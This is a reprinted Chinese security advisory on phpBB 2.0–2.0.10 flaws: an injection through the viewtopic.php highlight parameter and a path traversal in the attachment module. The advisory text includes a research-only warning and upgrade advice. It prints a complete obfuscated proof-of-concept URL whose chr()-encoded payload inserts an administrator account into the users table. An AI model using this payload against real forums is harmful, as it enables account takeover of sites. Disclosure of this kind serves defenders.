 |
phpBB任意用户增加和附件模块跨站脚本漏洞 |
|
|
| phpBB任意用户增加和附件模块跨站脚本漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-18 16:00:46 |
|
受影响系统:
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0
不受影响系统:
phpBB Group phpBB 2.0.11
描述:
--------------------------------------------------------------------------------
phpBB是一款使用多种模块扩展的流行的论坛系统。
phpBB viewtopic.php对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞增加任意拥有管理权限的用户帐户。
viewtopic.php对highlight参数缺少充分检查,提交使用多个char()函数的SQL查询,可在系统中增加管理员权限的用户帐户。
另外附件模块对用户提交给"UPLOAD_DIR"字段数据缺少充分过滤,提交包含多个../字符的数据,可绕过WEB ROOT限制,以进程权限查看系统文件内容。
<*来源:Zeelock (zee@psybnc.it)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110150451810187&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Zeelock (zee@psybnc.it)提供了如下测试方法:
--- Code start ----
http://site.com/forum/viewtopic.php?t=30&highlight=%2527%252emysql_query(chr
(73)%252echr(78)%252echr(83)%252echr(69)%252echr(82)%252echr(84)%252echr(32)
%252echr(73)%252echr(78)%252echr(84)%252echr(79)%252echr(32)%252echr(112)%25
2echr(104)%252echr(112)%252echr(98)%252echr(98)%252echr(95)%252echr(117)%252
echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(40)%252echr(117)%25
2echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(105)%252echr(100)%2
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%2
52echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(101)%2
52echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%
252echr(101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%
252echr(115)%252echr(119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)
%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(108
)%252echr(101)%252echr(118)%252echr(101)%252echr(108)%252echr(41)%252echr(32
)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(83)%25
2echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252ech
r(57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39
)%252echr(44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)
%252echr(111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%2
52echr(98)%252echr(97)%252echr(51)%252echr(99)%252echr(56)%252echr(51)%252ec
hr(51)%252echr(52)%252echr(56)%252echr(98)%252echr(100)%252echr(100)%252echr
(102)%252echr(55)%252echr(98)%252echr(51)%252echr(54)%252echr(56)%252echr(98
)%252echr(52)%252echr(55)%252echr(56)%252echr(97)%252echr(99)%252echr(48)%25
2echr(54)%252echr(100)%252echr(51)%252echr(51)%252echr(52)%252echr(48)%252ec
hr(101)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(
41))%252e%2527
--- code end ---
建议:
--------------------------------------------------------------------------------
厂商补丁:
phpBB Group
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到phpBB 2.0.11版本:
http://www.phpbb.com
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: PHPBlog流行BT下载程序v0.8任意文件下载漏洞
下一篇文章: 新蠕虫瞄准PHP新漏洞 Linux平台将不再是避风港 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
